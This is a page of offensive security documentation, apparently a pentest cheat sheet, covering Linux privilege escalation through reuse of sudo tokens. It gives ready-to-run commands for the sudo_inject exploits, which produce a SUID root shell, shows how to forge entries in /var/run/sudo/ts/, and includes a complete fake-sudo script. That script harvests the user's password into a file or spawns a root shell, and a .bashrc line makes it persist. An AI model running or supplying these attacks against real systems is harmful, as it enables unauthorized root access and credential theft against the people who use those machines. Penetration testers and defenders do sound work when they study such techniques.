> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Sudo Token Reuse

> Privilege escalation by reusing existing sudo tokens: sudo_inject and /var/run/sudo/ts/ abuse.

## Overview

After a user runs `sudo` and enters their password, a token is cached (default 5 minutes). If you have access to that user's session, you can reuse the token without knowing the password.

***

## Requirements

* User is in sudo group
* User has recently used sudo (token not expired)
* You have code execution as that user
* `ptrace_scope` allows process injection OR `/proc/sys/kernel/yama/ptrace_scope` = 0

### Check ptrace\_scope

```bash theme={"dark"}
cat /proc/sys/kernel/yama/ptrace_scope
```

| Value | Meaning                                        |
| ----- | ---------------------------------------------- |
| `0`   | Any process can ptrace any other (exploitable) |
| `1`   | Only parent can ptrace child                   |
| `2`   | Only admin can ptrace                          |
| `3`   | No ptrace at all                               |

### Check Token Existence

```bash theme={"dark"}
ls -la /var/run/sudo/ts/
ls -la /var/run/sudo/ts/$(whoami)
```

***

## sudo\_inject

```bash theme={"dark"}
https://github.com/nongiach/sudo_inject
```

### exploit.sh — Process Injection

Injects into a process owned by target user to activate sudo token:

```bash theme={"dark"}
./exploit.sh
```

Creates `/tmp/sh` — SUID shell:

```bash theme={"dark"}
/tmp/sh -p
```

### exploit\_v2.sh — No ptrace Required

Uses `/proc/pid/mem` instead of ptrace:

```bash theme={"dark"}
./exploit_v2.sh
```

### exploit\_v3.sh — Via Shared Library

Loads shared library into user process:

```bash theme={"dark"}
./exploit_v3.sh
/tmp/sh -p
```

***

## Manual Token Abuse

### Write sudo\_inject Token

If you can write to `/var/run/sudo/ts/<username>`:

```bash theme={"dark"}
ls -la /var/run/sudo/ts/
```

If writable, create a valid token entry. The token format is binary — use `write_sudo_token`:

```bash theme={"dark"}
https://github.com/nongiach/sudo_inject/blob/master/extra_tools/write_sudo_token.c

gcc write_sudo_token.c -o write_sudo_token
./write_sudo_token
sudo su
```

***

## Timestamp Directory Permissions

Default: `/var/run/sudo/ts/` owned by root with `0700`.

If misconfigured (writable):

```bash theme={"dark"}
ls -la /var/run/sudo/
# drwxrwxrwx = exploitable
```

***

## Sudo Timestamp Timeout

Check timeout:

```bash theme={"dark"}
sudo -l | grep timestamp
cat /etc/sudoers | grep timestamp_timeout
```

Default: 5 minutes. Any value `< 0` (e.g. `-1`) = never expires (always exploitable if token exists).

***

## Sudo Hijacking (PATH)

Create fake `sudo` in writable PATH directory:

```bash theme={"dark"}
cat > /tmp/sudo << 'EOF'
#!/bin/bash
/usr/bin/sudo -n true 2>/dev/null
if [ $? -eq 0 ]; then
    /usr/bin/sudo /bin/bash
else
    read -sp "[sudo] password for $(whoami): " pass
    echo "$pass" >> /tmp/stolen_passwords.txt
    echo "$pass" | /usr/bin/sudo -S "$@"
fi
EOF
chmod +x /tmp/sudo
export PATH=/tmp:$PATH
```

Next time user types `sudo` — either reuses token or captures password.

### Persistent via .bashrc

```bash theme={"dark"}
echo 'export PATH=/tmp:$PATH' >> ~/.bashrc
```

***

## Quick Reference

| Technique                   | Requirement                          |
| --------------------------- | ------------------------------------ |
| sudo\_inject (ptrace)       | ptrace\_scope = 0, active sudo token |
| sudo\_inject v2 (/proc/mem) | /proc/pid/mem readable               |
| Write sudo token            | Writable /var/run/sudo/ts/           |
| Sudo hijacking              | Writable PATH dir, user runs sudo    |
